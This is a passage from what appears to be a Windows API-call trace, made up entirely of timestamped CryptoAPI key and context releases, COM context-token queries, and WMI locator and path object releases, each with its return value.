dwFlags=0x0) returned 1 [0151.434] CryptDestroyKey (hKey=0xb7fd50) returned 1 [0151.434] CryptReleaseContext (hProv=0xb1ee18, dwFlags=0x0) returned 1 [0151.434] CryptDestroyKey (hKey=0xb7ef50) returned 1 [0151.434] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0152.867] CryptDestroyKey (hKey=0xbe15e8) returned 1 [0152.867] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0152.867] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0154.266] CryptDestroyKey (hKey=0xbe1468) returned 1 [0154.266] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0154.266] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0154.266] CryptDestroyKey (hKey=0xbe16a8) returned 1 [0154.266] CryptReleaseContext (hProv=0xbdf260, dwFlags=0x0) returned 1 [0154.266] CryptReleaseContext (hProv=0xbdf260, dwFlags=0x0) returned 1 [0155.300] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0155.300] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0155.300] WbemLocator:IUnknown:Release (This=0x6024b20) returned 0x1 [0155.301] WbemLocator:IUnknown:Release (This=0x6024b20) returned 0x0 [0155.301] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0155.301] WbemLocator:IUnknown:Release (This=0x6024aa0) returned 0x1 [0155.301] WbemLocator:IUnknown:Release (This=0x6024aa0) returned 0x0 [0155.301] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0155.301] WbemLocator:IUnknown:Release (This=0x60248e0) returned 0x1 [0155.301] WbemLocator:IUnknown:Release (This=0x60248e0) returned 0x0 [0155.301] IUnknown:Release (This=0x6027fe8) returned 0x0 [0155.301] IUnknown:Release (This=0x60284b0) returned 0x0 [0155.302] IUnknown:Release (This=0x6027cb8) returned 0x0 [0155.302] IUnknown:Release (This=0x6027b20) returned 0x0 [0155.302] IUnknown:Release (This=0x6028318) returned 0x0 [0155.302] IUnknown:Release (This=0x6028b10) returned 0x0 [0155.302] IUnknown:Release (This=0x6028978) returned 0x0 [0155.302] IUnknown:Release (This=0x6027e50) returned 0x0 [0155.302] IUnknown:Release (This=0x60287e0) returned 0x0 [0155.303] IUnknown:Release (This=0x6028648) returned 0x0 [0155.303] IUnknown:Release (This=0x6028180) returned 0x0 [0155.305] CryptDestroyKey (hKey=0xb7efd0) returned 1 [0155.305] CryptReleaseContext (hProv=0xbe07a0, dwFlags=0x0) returned 1 [0155.306] CryptReleaseContext (hProv=0xbe07a0, dwFlags=0x0) returned 1 [0155.306] CryptDestroyKey (hKey=0xbe1668) returned 1 [0155.306] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0155.306] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0155.309] CryptDestroyKey (hKey=0xbe1468) returned 1 [0155.309] CryptReleaseContext (hProv=0xbdfae0, dwFlags=0x0) returned 1 [0155.309] CryptReleaseContext (hProv=0xbdfae0, dwFlags=0x0) returned 1 [0156.916] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0156.916] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0156.916] WbemLocator:IUnknown:Release (This=0x6024b40) returned 0x1 [0156.916] WbemLocator:IUnknown:Release (This=0x6024b40) returned 0x0 [0156.916] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0156.916] WbemLocator:IUnknown:Release (This=0x6024b80) returned 0x1 [0156.916] WbemLocator:IUnknown:Release (This=0x6024b80) returned 0x0 [0156.917] CryptDestroyKey (hKey=0xb7fa90) returned 1 [0156.917] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0156.917] CryptReleaseContext (hProv=0xbdfbf0, dwFlags=0x0) returned 1 [0156.917] CryptDestroyKey (hKey=0xb7f490) returned 1 [0156.917] CryptReleaseContext (hProv=0xbdff20, dwFlags=0x0) returned 1 [0156.917] CryptReleaseContext (hProv=0xbdff20, dwFlags=0x0) returned 1 [0157.825] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0157.825] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0157.825] WbemLocator:IUnknown:Release (This=0x6024b60) returned 0x1 [0157.825] WbemLocator:IUnknown:Release (This=0x6024b60) returned 0x0 [0157.826] CryptDestroyKey (hKey=0xbe14e8) returned 1 [0157.826] CryptReleaseContext (hProv=0xbe0030, dwFlags=0x0) returned 1 [0157.826] CryptReleaseContext (hProv=0xbe0030, dwFlags=0x0) returned 1 [0157.826] CryptDestroyKey (hKey=0xb7f950) returned 1 [0157.826] CryptReleaseContext (hProv=0xbe09c0, dwFlags=0x0) returned 1 [0157.826] CryptReleaseContext (hProv=0xbe09c0, dwFlags=0x0) returned 1 [0157.826] CryptDestroyKey (hKey=0xb7f050) returned 1 [0157.826] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0157.827] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0159.107] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0159.107] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0159.107] WbemLocator:IUnknown:Release (This=0x6024bf0) returned 0x1 [0159.107] WbemLocator:IUnknown:Release (This=0x6024bf0) returned 0x0 [0159.107] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0159.107] WbemLocator:IUnknown:Release (This=0x6024b90) returned 0x1 [0159.107] WbemLocator:IUnknown:Release (This=0x6024b90) returned 0x0 [0159.107] CryptDestroyKey (hKey=0xb7f590) returned 1 [0159.107] CryptReleaseContext (hProv=0xbe09c0, dwFlags=0x0) returned 1 [0159.107] CryptReleaseContext (hProv=0xbe09c0, dwFlags=0x0) returned 1 [0159.107] CryptDestroyKey (hKey=0xb7ef90) returned 1 [0159.107] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0159.108] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0159.108] CryptDestroyKey (hKey=0xb7f010) returned 1 [0159.108] CryptReleaseContext (hProv=0xbe0b58, dwFlags=0x0) returned 1 [0159.108] CryptReleaseContext (hProv=0xbe0b58, dwFlags=0x0) returned 1 [0159.108] CryptDestroyKey (hKey=0xb7f710) returned 1 [0159.108] CryptReleaseContext (hProv=0xbdff20, dwFlags=0x0) returned 1 [0159.108] CryptReleaseContext (hProv=0xbdff20, dwFlags=0x0) returned 1 [0159.590] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0159.590] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0159.590] WbemLocator:IUnknown:Release (This=0x6024c30) returned 0x1 [0159.590] WbemLocator:IUnknown:Release (This=0x6024c30) returned 0x0 [0159.590] CryptDestroyKey (hKey=0xb7f710) returned 1 [0159.590] CryptReleaseContext (hProv=0xbe0c68, dwFlags=0x0) returned 1 [0159.590] CryptReleaseContext (hProv=0xbe0c68, dwFlags=0x0) returned 1 [0161.213] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0161.213] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0161.213] WbemLocator:IUnknown:Release (This=0x60275c0) returned 0x1 [0161.213] WbemLocator:IUnknown:Release (This=0x60275c0) returned 0x0 [0161.213] CryptDestroyKey (hKey=0xb7f0d0) returned 1 [0161.213] CryptReleaseContext (hProv=0xbe0cf0, dwFlags=0x0) returned 1 [0161.213] CryptReleaseContext (hProv=0xbe0cf0, dwFlags=0x0) returned 1 [0161.213] CryptDestroyKey (hKey=0xb7f290) returned 1 [0161.213] CryptReleaseContext (hProv=0xbe0030, dwFlags=0x0) returned 1 [0161.213] CryptReleaseContext (hProv=0xbe0030, dwFlags=0x0) returned 1 [0161.977] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0161.977] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0161.977] WbemLocator:IUnknown:Release (This=0x6027580) returned 0x1 [0161.977] WbemLocator:IUnknown:Release (This=0x6027580) returned 0x0 [0161.978] CryptDestroyKey (hKey=0xb7f9d0) returned 1 [0161.978] CryptReleaseContext (hProv=0xbe0cf0, dwFlags=0x0) returned 1 [0161.978] CryptReleaseContext (hProv=0xbe0cf0, dwFlags=0x0) returned 1 [0161.978] CryptDestroyKey (hKey=0xb7f750) returned 1 [0161.978] CryptReleaseContext (hProv=0xbe10a8, dwFlags=0x0) returned 1 [0161.978] CryptReleaseContext (hProv=0xbe10a8, dwFlags=0x0) returned 1 [0161.979] CryptDestroyKey (hKey=0xb7f510) returned 1 [0161.979] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0161.979] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0163.537] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0163.537] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0163.537] WbemLocator:IUnknown:Release (This=0x6027680) returned 0x1 [0163.537] WbemLocator:IUnknown:Release (This=0x6027680) returned 0x0 [0163.537] CryptDestroyKey (hKey=0xb7f510) returned 1 [0163.537] CryptReleaseContext (hProv=0xbe0030, dwFlags=0x0) returned 1 [0163.538] CryptReleaseContext (hProv=0xbe0030, dwFlags=0x0) returned 1 [0163.538] CryptDestroyKey (hKey=0xb7ef90) returned 1 [0163.538] CryptReleaseContext (hProv=0xb1ee18, dwFlags=0x0) returned 1 [0163.538] CryptReleaseContext (hProv=0xb1ee18, dwFlags=0x0) returned 1 [0163.538] CryptDestroyKey (hKey=0xb7f650) returned 1 [0163.539] CryptReleaseContext (hProv=0xb1ea60, dwFlags=0x0) returned 1 [0163.539] CryptReleaseContext (hProv=0xb1ea60, dwFlags=0x0) returned 1 [0164.722] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0164.723] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0164.723] WbemLocator:IUnknown:Release (This=0x6027630) returned 0x1 [0164.723] WbemLocator:IUnknown:Release (This=0x6027630) returned 0x0 [0164.723] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0164.723] WbemLocator:IUnknown:Release (This=0x6027590) returned 0x1 [0164.723] WbemLocator:IUnknown:Release (This=0x6027590) returned 0x0 [0164.723] IUnknown:Release (This=0x6028318) returned 0x0 [0164.723] IUnknown:Release (This=0x6027e50) returned 0x0 [0164.723] IUnknown:Release (This=0x60284b0) returned 0x0 [0164.723] IUnknown:Release (This=0x6027fe8) returned 0x0 [0164.724] IUnknown:Release (This=0x6027b20) returned 0x0 [0164.724] IUnknown:Release (This=0x6028648) returned 0x0 [0164.724] IUnknown:Release (This=0x60287e0) returned 0x0 [0164.724] IUnknown:Release (This=0x6028b10) returned 0x0 [0164.724] IUnknown:Release (This=0x6027cb8) returned 0x0 [0164.724] IUnknown:Release (This=0x6028180) returned 0x0 [0164.725] IUnknown:Release (This=0x6028978) returned 0x0 [0164.726] CryptDestroyKey (hKey=0xbe1628) returned 1 [0164.726] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0164.726] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0164.727] CryptDestroyKey (hKey=0xb7f650) returned 1 [0164.727] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0164.727] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0164.728] CryptDestroyKey (hKey=0xb7fa10) returned 1 [0164.728] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0164.728] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0164.729] CryptDestroyKey (hKey=0xb7f390) returned 1 [0164.729] CryptReleaseContext (hProv=0xb1eb70, dwFlags=0x0) returned 1 [0164.729] CryptReleaseContext (hProv=0xb1eb70, dwFlags=0x0) returned 1 [0166.964] CryptDestroyKey (hKey=0xb7fb90) returned 1 [0166.964] CryptReleaseContext (hProv=0xb1daf8, dwFlags=0x0) returned 1 [0166.964] CryptReleaseContext (hProv=0xb1daf8, dwFlags=0x0) returned 1 [0168.016] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0168.016] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0168.016] WbemLocator:IUnknown:Release (This=0x60276a0) returned 0x1 [0168.016] WbemLocator:IUnknown:Release (This=0x60276a0) returned 0x0 [0168.016] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0168.016] WbemLocator:IUnknown:Release (This=0x60276f0) returned 0x1 [0168.016] WbemLocator:IUnknown:Release (This=0x60276f0) returned 0x0 [0168.017] CryptDestroyKey (hKey=0xb7f510) returned 1 [0168.017] CryptReleaseContext (hProv=0xb1e730, dwFlags=0x0) returned 1 [0168.017] CryptReleaseContext (hProv=0xb1e730, dwFlags=0x0) returned 1 [0168.017] CryptReleaseContext (hProv=0xb1e950, dwFlags=0x0) returned 1 [0168.017] CryptDestroyKey (hKey=0xb7fb90) returned 1 [0168.018] CryptReleaseContext (hProv=0xb1eb70, dwFlags=0x0) returned 1 [0168.018] CryptReleaseContext (hProv=0xb1eb70, dwFlags=0x0) returned 1 [0168.018] CryptDestroyKey (hKey=0xb7f9d0) returned 1 [0168.018] CryptReleaseContext (hProv=0xb1e950, dwFlags=0x0) returned 1 [0170.286] CryptDestroyKey (hKey=0xb7f790) returned 1 [0170.286] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0170.287] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0170.287] CryptDestroyKey (hKey=0xb7f6d0) returned 1 [0170.287] CryptReleaseContext (hProv=0x66ba520, dwFlags=0x0) returned 1 [0170.287] CryptReleaseContext (hProv=0x66ba520, dwFlags=0x0) returned 1 [0170.287] CryptDestroyKey (hKey=0xb7fb90) returned 1 [0170.287] CryptReleaseContext (hProv=0x66ba498, dwFlags=0x0) returned 1 [0170.287] CryptReleaseContext (hProv=0x66ba498, dwFlags=0x0) returned 1 [0171.418] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0171.418] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.418] WbemLocator:IUnknown:Release (This=0xb5bc94) returned 0x1 [0171.418] WbemLocator:IUnknown:Release (This=0x603305c) returned 0x0 [0171.548] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.548] WbemLocator:IUnknown:Release (This=0xb5bba4) returned 0x1 [0171.548] WbemLocator:IUnknown:Release (This=0x6027a84) returned 0x0 [0171.549] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.549] WbemLocator:IUnknown:Release (This=0xb5b9c4) returned 0x1 [0171.549] WbemLocator:IUnknown:Release (This=0x60279ac) returned 0x0 [0171.550] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.550] WbemLocator:IUnknown:Release (This=0xb5b334) returned 0x1 [0171.550] WbemLocator:IUnknown:Release (This=0x60330b4) returned 0x0 [0171.550] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.550] WbemLocator:IUnknown:Release (This=0xb5b7e4) returned 0x1 [0171.550] WbemLocator:IUnknown:Release (This=0x602481c) returned 0x0 [0171.552] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.552] WbemLocator:IUnknown:Release (This=0xb5b8d4) returned 0x1 [0171.552] WbemLocator:IUnknown:Release (This=0x601ef9c) returned 0x0 [0171.553] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.553] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x1 [0171.553] WbemLocator:IUnknown:Release (This=0x602476c) returned 0x0 [0171.554] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.554] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x1 [0171.554] WbemLocator:IUnknown:Release (This=0x60247c4) returned 0x0 [0171.555] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.555] WbemLocator:IUnknown:Release (This=0xb5b244) returned 0x1 [0171.555] WbemLocator:IUnknown:Release (This=0x6024634) returned 0x0 [0171.555] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.555] WbemLocator:IUnknown:Release (This=0xb5bab4) returned 0x1 [0171.556] WbemLocator:IUnknown:Release (This=0x6033164) returned 0x0 [0171.558] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.558] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0171.558] WbemLocator:IUnknown:Release (This=0x603310c) returned 0x0 [0171.983] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.983] WbemLocator:IUnknown:Release (This=0x60276a0) returned 0x1 [0171.983] WbemLocator:IUnknown:Release (This=0x60276a0) returned 0x0 [0171.983] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.983] WbemLocator:IUnknown:Release (This=0x6027750) returned 0x1 [0171.983] WbemLocator:IUnknown:Release (This=0x6027750) returned 0x0 [0171.983] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.983] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x1 [0171.983] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x0 [0171.983] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0171.983] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.983] WbemDefPath:IUnknown:Release (This=0x6025df0) returned 0x1 [0171.983] WbemDefPath:IUnknown:Release (This=0x6025df0) returned 0x0 [0171.983] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.983] WbemDefPath:IUnknown:Release (This=0x6025d80) returned 0x1 [0171.983] WbemDefPath:IUnknown:Release (This=0x6025d80) returned 0x0 [0171.983] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.983] WbemDefPath:IUnknown:Release (This=0x6026020) returned 0x1 [0171.983] WbemDefPath:IUnknown:Release (This=0x6026020) returned 0x0 [0171.983] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.983] WbemDefPath:IUnknown:Release (This=0x60307f0) returned 0x1 [0171.983] WbemDefPath:IUnknown:Release (This=0x60307f0) returned 0x0 [0171.983] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.984] WbemDefPath:IUnknown:Release (This=0x6030780) returned 0x1 [0171.984] WbemDefPath:IUnknown:Release (This=0x6030780) returned 0x0 [0171.984] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.984] WbemDefPath:IUnknown:Release (This=0x6025d10) returned 0x1 [0171.984] WbemDefPath:IUnknown:Release (This=0x6025d10) returned 0x0 [0171.984] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.984] WbemDefPath:IUnknown:Release (This=0x6025ca0) returned 0x1 [0171.984] WbemDefPath:IUnknown:Release (This=0x6025ca0) returned 0x0 [0171.984] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.984] WbemDefPath:IUnknown:Release (This=0x6030710) returned 0x1 [0171.984] WbemDefPath:IUnknown:Release (This=0x6030710) returned 0x0 [0171.984] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.984] WbemDefPath:IUnknown:Release (This=0x60306a0) returned 0x1 [0171.984] WbemDefPath:IUnknown:Release (This=0x60306a0) returned 0x0 [0171.984] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.984] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x1 [0171.984] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x0 [0171.984] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.984] WbemDefPath:IUnknown:Release (This=0x6026250) returned 0x1 [0171.984] WbemDefPath:IUnknown:Release (This=0x6026250) returned 0x0 [0171.984] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.984] WbemDefPath:IUnknown:Release (This=0x60261e0) returned 0x1 [0171.984] WbemDefPath:IUnknown:Release (This=0x60261e0) returned 0x0 [0171.984] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.984] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0171.984] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x0 [0171.984] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.985] WbemDefPath:IUnknown:Release (This=0x6026170) returned 0x1 [0171.985] WbemDefPath:IUnknown:Release (This=0x6026170) returned 0x0 [0171.985] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.985] WbemDefPath:IUnknown:Release (This=0x6026100) returned 0x1 [0171.985] WbemDefPath:IUnknown:Release (This=0x6026100) returned 0x0 [0171.985] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.985] WbemDefPath:IUnknown:Release (This=0x6026090) returned 0x1 [0171.985] WbemDefPath:IUnknown:Release (This=0x6026090) returned 0x0 [0171.985] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.985] WbemDefPath:IUnknown:Release (This=0x6025fb0) returned 0x1 [0171.985] WbemDefPath:IUnknown:Release (This=0x6025fb0) returned 0x0 [0171.985] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.985] WbemDefPath:IUnknown:Release (This=0x6025f40) returned 0x1 [0171.985] WbemDefPath:IUnknown:Release (This=0x6025f40) returned 0x0 [0171.985] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.985] WbemDefPath:IUnknown:Release (This=0x6025ed0) returned 0x1 [0171.985] WbemDefPath:IUnknown:Release (This=0x6025ed0) returned 0x0 [0171.985] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.985] WbemDefPath:IUnknown:Release (This=0x6025e60) returned 0x1 [0171.985] WbemDefPath:IUnknown:Release (This=0x6025e60) returned 0x0 [0171.985] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.985] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x1 [0171.985] WbemDefPath:IUnknown:Release (This=0x6030860) returned 0x0 [0171.985] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0171.985] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x1 [0171.985] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x0 [0171.986] IUnknown:Release (This=0x6028180) returned 0x0 [0171.986] IUnknown:Release (This=0x6028b10) returned 0x0 [0171.986] IUnknown:Release (This=0x6028978) returned 0x0 [0171.986] IUnknown:Release (This=0x6027cb8) returned 0x0 [0171.986] CryptReleaseContext (hProv=0x66ba630, dwFlags=0x0) returned 1 [0171.987] CryptDestroyKey (hKey=0xb7f790) returned 1 [0171.987] CryptReleaseContext (hProv=0xb1e950, dwFlags=0x0) returned 1 [0171.987] CryptReleaseContext (hProv=0xb1e950, dwFlags=0x0) returned 1 [0171.989] CryptDestroyKey (hKey=0xb7f6d0) returned 1 [0171.989] CryptReleaseContext (hProv=0xb1e730, dwFlags=0x0) returned 1 [0171.989] CryptReleaseContext (hProv=0xb1e730, dwFlags=0x0) returned 1 [0171.989] CryptDestroyKey (hKey=0xb7f3d0) returned 1 [0171.989] CryptReleaseContext (hProv=0x66ba630, dwFlags=0x0) returned 1 [0173.608] CryptDestroyKey (hKey=0xb7f650) returned 1 [0173.608] CryptReleaseContext (hProv=0x66ba850, dwFlags=0x0) returned 1 [0173.608] CryptReleaseContext (hProv=0x66ba850, dwFlags=0x0) returned 1 [0174.445] CryptDestroyKey (hKey=0xb7f950) returned 1 [0174.445] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0174.446] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0174.446] CryptDestroyKey (hKey=0xb7f6d0) returned 1 [0174.446] CryptReleaseContext (hProv=0x66baaf8, dwFlags=0x0) returned 1 [0174.446] CryptReleaseContext (hProv=0x66baaf8, dwFlags=0x0) returned 1 [0176.377] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0176.377] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0176.377] WbemLocator:IUnknown:Release (This=0x60275c0) returned 0x1 [0176.377] WbemLocator:IUnknown:Release (This=0x60275c0) returned 0x0 [0176.377] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0176.377] WbemLocator:IUnknown:Release (This=0x6027600) returned 0x1 [0176.377] WbemLocator:IUnknown:Release (This=0x6027600) returned 0x0 [0176.378] CryptDestroyKey (hKey=0xb7fb50) returned 1 [0176.378] CryptReleaseContext (hProv=0x66ba630, dwFlags=0x0) returned 1 [0176.378] CryptReleaseContext (hProv=0x66ba630, dwFlags=0x0) returned 1 [0176.378] CryptDestroyKey (hKey=0xb7f6d0) returned 1 [0176.378] CryptReleaseContext (hProv=0x66ba850, dwFlags=0x0) returned 1 [0176.378] CryptReleaseContext (hProv=0x66ba850, dwFlags=0x0) returned 1 [0176.378] CryptDestroyKey (hKey=0xb7f250) returned 1 [0176.378] CryptReleaseContext (hProv=0x66baaf8, dwFlags=0x0) returned 1 [0176.379] CryptReleaseContext (hProv=0x66baaf8, dwFlags=0x0) returned 1 [0177.475] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0177.475] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0177.475] WbemLocator:IUnknown:Release (This=0x6027760) returned 0x1 [0177.475] WbemLocator:IUnknown:Release (This=0x6027760) returned 0x0 [0177.475] CryptDestroyKey (hKey=0xb7f4d0) returned 1 [0177.475] CryptReleaseContext (hProv=0x66bab80, dwFlags=0x0) returned 1 [0177.476] CryptDestroyKey (hKey=0xb7f6d0) returned 1 [0177.476] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0177.476] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0177.476] CryptReleaseContext (hProv=0x66bab80, dwFlags=0x0) returned 1 [0178.361] IUnknown:Release (This=0x6028180) returned 0x0 [0178.361] IUnknown:Release (This=0x6028b10) returned 0x0 [0178.361] IUnknown:Release (This=0x6027cb8) returned 0x0 [0178.361] IUnknown:Release (This=0x60287e0) returned 0x0 [0178.361] IUnknown:Release (This=0x6028978) returned 0x0 [0178.361] CryptDestroyKey (hKey=0xb7f6d0) returned 1 [0178.361] CryptReleaseContext (hProv=0x66baaf8, dwFlags=0x0) returned 1 [0178.362] CryptReleaseContext (hProv=0x66baaf8, dwFlags=0x0) returned 1 [0178.362] CryptDestroyKey (hKey=0xb7f7d0) returned 1 [0178.362] CryptReleaseContext (hProv=0xb1eb70, dwFlags=0x0) returned 1 [0178.362] CryptReleaseContext (hProv=0xb1eb70, dwFlags=0x0) returned 1 [0178.363] CryptDestroyKey (hKey=0xb7fad0) returned 1 [0178.363] CryptReleaseContext (hProv=0x66ba7c8, dwFlags=0x0) returned 1 [0178.363] CryptReleaseContext (hProv=0x66ba7c8, dwFlags=0x0) returned 1 [0179.308] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0179.308] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0179.308] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x1 [0179.309] WbemLocator:IUnknown:Release (This=0x60277b0) returned 0x0 [0179.309] CryptDestroyKey (hKey=0xb7f290) returned 1 [0179.309] CryptReleaseContext (hProv=0x66ba9e8, dwFlags=0x0) returned 1 [0179.309] CryptReleaseContext (hProv=0x66ba9e8, dwFlags=0x0) returned 1 [0179.309] CryptDestroyKey (hKey=0xb7fb50) returned 1 [0179.309] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0179.309] CryptReleaseContext (hProv=0x66baa70, dwFlags=0x0) returned 1 [0179.310] CryptDestroyKey 